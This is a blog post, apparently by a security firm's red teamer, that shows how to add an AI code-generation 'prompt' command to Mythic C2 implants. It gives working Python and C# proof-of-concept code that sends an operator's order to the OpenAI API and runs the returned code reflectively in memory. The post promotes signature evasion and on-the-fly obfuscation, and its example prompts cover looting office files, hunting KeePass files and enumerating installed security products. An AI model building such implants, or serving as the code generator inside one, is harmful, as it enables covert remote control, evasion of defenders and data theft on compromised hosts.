Talk To Your Malware - Integrating AI Capability in an Open-Source C2 Agent

TL;DR

Introducing malware agents (implants) that uses AI to generate and execute code. Operators can now simply “talk” to their implants, and it will magically execute the requested instructions. For example, an operator could say: “Scan every user’s home folder and pack any office file under 2MB inside a single archive located in C:/test/output.zip“, and the implant would obey.
This has several advantages:

Having a more personalized and intuitive way to conduct offensive operations;

Generating unique code at each generation that is more difficult to create signatures for;

Eliminating development efforts that would have been required for simple tasks;

Adding optional AI based code obfuscation on the fly.

The code discussed in this article can be found here.

High-level Introduction

The cybersecurity industry is currently pushing artificial intelligence in every part of the defensive landscape to facilitate the life of analysts, incident responders, and defenders alike. This shift has become a major advantage for the blue team since it dramatically reduces the efforts and skills required for day-to-day operations.
The same frame of mind can be applied to offensive security, but many of the tool sets available for operators lacked this edge, until now. I will attempt to integrate AI into a particular type of malware: implants. This type of malware is specifically designed to control a system remotely, as covertly as possible.

Technical Introduction

During the lifecycle of an agent/implant, we frequently find ourselves having to develop new commands to adapt to a given operational need.
Certain capabilities such as Beacon Object Files (BOF) execution, reflective execution of assemblies or unmanaged PEs, have made it possible to centralize execution capacity and externalize command development. But this requires the corresponding loader to be embedded in the implant (COFF loader for example), which can increase the level of detection depending on the implementation.
Some C2s, such as Mythic, allow their implants to load commands dynamically, so they don’t have to be embedded beforehand. For example, Mythic’s Python agent “Medusa” from the excellent @ajpc500 features this ability to load external commands via the load command.
However, the number of available commands in the Medusa agent is limited, so the operator is required to add new commands depending on current operational needs, such as probing a TCP port or retrieving a file from a URL.
What if you could directly “talk” to your implant, so that the command could be “coded” on the fly, without having to be developed beforehand?

Proof of Concept

To get started, let’s create at least 2 PoCs in languages commonly used in offensive contexts. The PoCs can later be integrated into Mythic’s implants Medusa (Python) and Apollo (C#).
For our proof of concept, we’re going to create a program (in both languages) that performs the following workflow:

[Getting the prompt from user] 
[Building the full prompt with additional details and constraints] 
[Asking AI through API to generate code] 
[Sanitizing output] 
[Verifying if code is syntactically valid] 
[Execute reflectively the generated code] 
[Prints output to stdout]

This can be summarized by the following diagram:

Prompt template

The program embedded a prompt template with which it will build the final prompt based on user input.
Here is the Python version of the prompt template:

I am going to give you an order, and you will answer only by using python code.
For example, if I ask you to list a system folder, you will write python code that list the system folder and prints the output.    
Constraints:
- The python code will be running on a {platform.system()} system
- Always print the result if there is one. If your result is a list, print every element, one by line.
- Use only native python module (no pip install)
The order is: [insert user prompt here]

Note: The prompt dynamically recovers the type of OS it’s running by doing platform.system(), so that the code can seamlessly adapt to the system context. For example, being on Windows allows you to extensively use ctypes to interact with the WinAPI, and avoid using system commands.

Python Version

The following Python code implements the workflow described above:

import os, sys, ast, json, platform, http.client

# Argument handling
# [redacted for simplicity]

# Define base prompt
# [redacted for simplicity]

# OpenAI API host and endpoint
HOST = "api.openai.com"
ENDPOINT = "/v1/chat/completions"
MODEL  = 'gpt-4o-mini' # cheap and efficient model
API_KEY = "[API key here]"

# Function to send a request to OpenAI API
def send_prompt(prompt, model=MODEL):
    # Prepare request data
    headers = {
        "Content-Type": "application/json",
        "Authorization": f"Bearer {API_KEY}"
    }
    payload = json.dumps({
        "model": model,
        "messages": [{"role": "user", "content": prompt}],
        "temperature": 0.2  # low temperature for straight answer, less halucination, better for coding
    })

    # Establish connection and send request
    conn = http.client.HTTPSConnection(HOST)
    conn.request("POST", ENDPOINT, body=payload, headers=headers)

    # Get response
    response = conn.getresponse()
    if response.status != 200:
        print(f"Error: Received status code {response.status}")
        print(response.read().decode())
    data = response.read().decode()
    conn.close()

    # Return generated code 
    if data:
        response_json = json.loads(data)
        return response_json["choices"][0]["message"]["content"]
    else: 
        return str() # code will be verified later before execution

Demo

Issuing some prompts on a Linux system.

The full code can be found here.

C# Version

The C# version was a little more complex to achieve in-process reflective compilation and execution.
Note: In this context, “in-process” means that the execution stays in the current process and does not spawn any (sub)process, and “reflective” means compiling/executing code from a byte array in memory, without touching the disk.
Points worth mentioning:

The (reflective) compilation is done using the Microsoft Roslyn API;
The (reflective) execution is done with Assembly.Load (this could be done better).

// [imports, redacted for simplicity]

namespace RoslynCompileAndExecute
{
    class Program
    {
        static string SanitizeSourceCode(string sourceCode)
        {
            // [function code redacted for simplicity]
        }

        // Main
        static void Main(string[] args)
        {

            // Argument handling
            // [redacted for simplicity]

            // Build the main prompt
            // [redacted for simplicity]

            // Configure ChatGPT request (set your API key here)
            string apiKey = "[redacted]"; 
            string url = "https://api.openai.com/v1/chat/completions";
            string jsonRequestBody = $@"{{
                ""model"": ""gpt-4o-mini"",
                ""temperature"": 0.2,
                ""messages"": [
                    {{ ""role"": ""user"", ""content"": ""{escapedprompt}"" }}
                ]
            }}";

            // Create the HTTP request 
            HttpWebRequest request = (HttpWebRequest)WebRequest.Create(url);
            request.Method = "POST";
            request.ContentType = "application/json";
            request.Headers["Authorization"] = "Bearer " + apiKey;

            // Write the request body
            using (var streamWriter = new StreamWriter(request.GetRequestStream()))
            {
                streamWriter.Write(jsonRequestBody);
                streamWriter.Flush();
            }

            // Get and read the response
            string responseContent;
            using (HttpWebResponse response = (HttpWebResponse)request.GetResponse())
            {
                using (var streamReader = new StreamReader(response.GetResponseStream()))
                {
                    responseContent = streamReader.ReadToEnd();
                }
            }

            // Deserialize the JSON response to extract the generated code
            ChatCompletionResponse chatResponse;
            using (var ms = new MemoryStream(System.Text.Encoding.UTF8.GetBytes(responseContent)))
            {
                var serializer = new DataContractJsonSerializer(typeof(ChatCompletionResponse));
                chatResponse = (ChatCompletionResponse)serializer.ReadObject(ms);
            }

            // The generated C# code 
            string sourceCode = chatResponse.Choices[0].Message.Content;

            // Sanitize the source code
            sourceCode = SanitizeSourceCode(sourceCode);

            // Parse the source code into a syntax tree
            SyntaxTree syntaxTree = CSharpSyntaxTree.ParseText(sourceCode);

            // Prepare references required for compilation.
            string assemblyPath = Path.GetDirectoryName(typeof(object).Assembly.Location);
            var references = new List()
            {
                // [redacted for simplicity]
            };

            // Create a Roslyn compilation for a dynamically linked library
            CSharpCompilation compilation = CSharpCompilation.Create(
                "DynamicAssembly",
                new[] { syntaxTree },
                references,
                new CSharpCompilationOptions(OutputKind.DynamicallyLinkedLibrary));

            // Emit the compiled assembly to a MemoryStream (our byte buffer)
            using (var ms = new MemoryStream())
            {
                EmitResult result = compilation.Emit(ms);
                if (!result.Success)
                {
                    foreach (Diagnostic diagnostic in result.Diagnostics)
                    {
                        // If there are compilation errors, output them and exit.
                        Console.Error.WriteLine(diagnostic.ToString());
                    }
                    return;
                }

                // Get the compiled assembly as a byte array.
                byte[] assemblyBytes = ms.ToArray();

                // Load the assembly from the byte array using reflection.
                Assembly assembly = Assembly.Load(assemblyBytes);

                // Find the type and method to execute.
                Type dynamicType = assembly.GetType("DynamicProgram");
                MethodInfo executeMethod = dynamicType?.GetMethod("Execute", BindingFlags.Public | BindingFlags.Static);
                if (executeMethod != null)
                {
                    // Execute method
                    executeMethod.Invoke(null, null);
                }
                else
                {
                    Console.Error.WriteLine("Method 'Execute' not found");
                }
            }
        }
    }
}

Demo:

Listing files of a directory.

Spawning mspaint.exe in a detached process.

The full code can be found here.

Integrating the prompt Command in Mythic’s Medusa Agent

To add a command named “prompt” to a Medusa implant, one needs to add the following files:

The implant-side code:
[Mythic folder]/InstalledServices/medusa/medusa/agent_code/prompt.py
The server-side code:
[Mythic folder]/InstalledServices/medusa/medusa/mythic/agent_functions/prompt.py

Note: If you wish to create a new command from scratch, you can start by copying cat.py from those folders to have basic working code.

Once you are finished editing your code, restart the Medusa container:
[Mythic folder]/mythic-cli restart medusa

Check the logs to check if any errors occurred:
[Mythic folder]/mythic-cli logs medusa

From the running implant, simply run: load prompt

Note: When developing the code for a command, there’s no need to unload then load the command to reload the code, simply run load.

Command Design

First, we’re going to improve our communication model:

Advantages of this model compared to the previous PoC (implant <-> API vs. C2 <-> API)

API key cannot be recovered from implant code (in case of artifact compromise);

API domain cannot be used as a network indicator. For example, it would be strange to have a system process communicating with api.openai.com (and is not supposed to);

More practical for dev/working on offline Windows VMs, since the C2 is the one making network requests to the API.

Command’s Options

model: Being able to choose the GPT model that will be generating code.

cmdless: Prevents generated code from issuing system/shell commands or spawn (sub)processes. This adds the following constraint to the main prompt: “Do not use any system shell command, or any local system executables“.
obfuscation: Allows on the fly obfuscation of the defined function/class/variable names. This adds the following constraint to the main prompt: “For any variable or function or class, or object you define, name it by using words that are fruit, animal, or plant. Make sure to use words without any special characters“.

Options available when running the prompt command

Medusa Constraints

My initial implementation of Python code execution using the native exec function mixed with the way Medusa works, produced improper handling of function and class definitions.
The issue is that when executing Python code in Medusa via the native exec function, all the functions/classes defined in the code are unable to retrieve imports/variables/functions/classes that are defined outside their body.
This same execution implementation (with the Python exec function) is used in the Medusa’s built-in load_script.py command, I’ve noticed the issue in the past without understanding why.
For example, if you execute the following code with Medusa’s load_script:

value1 = 1
def add():
    return value1+1
add()

You would get the following error:

Error when running a function calling an external variable with load_script.

What I understood is that it does not work with exec because it’s using separate dictionaries for global and local variables, so that functions and classes defined within the executed code were looking only in the global dictionary for variables, while those variables were stored in the local dictionary.
The following code execution implementation circumvent this:

# Ensure built-in functions (including __import__) are available
namespace = dict()
namespace['__builtins__'] = __import__('builtins')

# Compile the source code in 'exec' mode
code_obj = compile(generated_code, '', 'exec')

# Use the same dictionary for both globals and locals
eval(code_obj, namespace, namespace)

This approach uses a unified namespace and the same dictionary for both globals and locals, making sure that all definitions such as variables, modules, and even built-in functions explicitly added with namespace['__builtins__'] = __import__('builtins') stay accessible throughout the executed code.

Implant-side Code

As all the work is delegated server-side (communication with API and code processing), the implant-side command code is less than 20 lines (without comments). In a nutshell, this makes it possible to have an extra-powerful feature with an extra-light code footprint:

def prompt(self, task_id, prompt, model, cmdless, obfuscation):
    import io, ast, sys

    # prompt has been replaced by generated Python code by the server (this is a solution to send data to the agent from the server)
    generated_code = prompt

    # verifying (again) if the code is correct
    try:
        ast.parse(generated_code)  
    except Exception as e:
        return f"Execution failed: {e}"
    
    # Get output
    output_capture = io.StringIO()
    sys.stdout = output_capture

    #exec(generated_code) # OLD
    # better exec code that support external variables/classes within classes and function:
    namespace = dict()
    # Ensure built-in functions (including __import__) are available
    namespace['__builtins__'] = __import__('builtins')
    # Compile the source code in 'exec' mode
    code_obj = compile(generated_code, '', 'exec')
    # Use the same dictionary for both globals and locals
    eval(code_obj, namespace, namespace)

    # Get the output
    sys.stdout = sys.__stdout__
    captured_output = output_capture.getvalue()

    # display result
    return f"Output:\n\n{captured_output}"

Crashsafe Command Handling

Some code generations may be incorrect. In this case, the error will be returned, and the implant will remain alive. Here’s an example of the submission of the same prompt, first generating incorrect code causing a crash, then valid code execution on the second attempt:

Multiple attempts at the same prompt, without risk of crashing the implant.

Pros, Cons and Limitations

Pros [+]

Having a more personalized and intuitive way to operate. For example, being able to say: “scan every user’s home folder, and pack any office file under 2MB inside a single archive located in C:/test/output.zip” (this kind of prompt can significantly speed up the loot phase);

Generate unique code at each generation (more difficult to sign);

No development efforts for simple tasks;

Optional AI based code obfuscation on the fly;

Extra-light implant-side code;

Possibility to include live translation, in the case of operating on a host in a foreign language;

The current implementation of the prompt command in Medusa is crashsafe. If the generated code crashes, the implant remains alive.

Cons [-]

It’s so skid-friendly it terrifies me;

Using an implant with AI capability has a higher ecological impact than a traditional implant.

Limitations [!]

The current AI limitations in and of itself, although it will continuously improve. At the time of writing this article, we cannot expect to ask overly complex operations, or to produce elite opsec/stealth code;

The confidentiality concern arise when operating on an implant within a client’s environment. It should be noted that although ChatGPT generates the code used by the implant, the latter does not see the result produced by code execution. For the time being, it’s up to the operator to check what is given to AI within the prompt or to set up an internal AI to keep data offline;

Each issued command has a price (generally a fraction of a cent, depending on the input/output complexity of the prompt and API pricing).

Future improvements [i]

There is currently no operator validation before the generated code is executed. Would be nice to be able to “pause and edit” before shooting the code;

Implement this feature as an MCP server for Mythic, so that all types of implants (Apollo, Poseidon, …) can conveniently integrate it.

Example of Useful Prompts

Some things that can sometimes be long to achieve with standard implant commands (such as ls) while avoiding system/shell commands:

“Enumerate the users who do not have the following folders empty: Desktop, Downloads“. This can be useful when there are a many users on a host/share;

“Give me the list of browsers used by each system user by looking at their folders in AppData“;

“List all the security solutions present on the system by looking at the program folders. Quickly describes each security solution observed, by giving a short text about what they are“;

“Crawl the remote share \\test\share to find any keepass file“;

“Fetch this archive at https://… and uncompress it in the C:\test folder“.

Demo

With that being said, here’s a demo of the prompt command:

The full code can be found here.

Conclusion

This feature makes it possible to generate personalized code on the fly with no development effort. As security solutions evolve and start using AI increasingly, malware will also follow this branch and integrate intelligence into its core. Although the code provided in this article is only proof of concept, it is likely that some C2s will incorporate this capability in the future.

Credits

@its_a_feature_ who kindly enlightened me on some aspects of the server-side code, and is the Mythic developer himself: https://github.com/its-a-feature/Mythic

@ajpc500 for the Medusa agent, among others (if you read this Alfie please accept my Discord friend request): https://github.com/MythicAgents/Medusa

OpenAI’s ChatGPT which is currently used by the implant in this article, but that also changed my life: https://chatgpt.com

Author

jdi

Talk To Your Malware – Integrating AI Capability in an Open-Source C2 Agent

Search

Categories

Recent Posts

What We Do

Company

GLOBAL HEADQUARTERS

Cyber Risks

Sensitive Data Security

Private Equity Firms

Cybersecurity Compliance

Cyber Insurance

Ransomware

Zero-Day Attacks

Consolidate, Evolve & Thrive

OUR SOC

Proactive Defense, 24/7

GoSecure Partners with Northbridge Financial to Provide Incident Preparation and Response Services

Microsoft 365 Direct Send Abuse Enables Internal Email Spoofing

Microsoft SharePoint Emergency RCE Patches

Threat Hunt of the Month: External Remote Services Exploited for Initial Access and Persistence

Microsoft 365 Direct Send Abuse Enables Internal Email Spoofing

Microsoft SharePoint Emergency RCE Patches

Get A Demo

Build A Quote

Become A Partner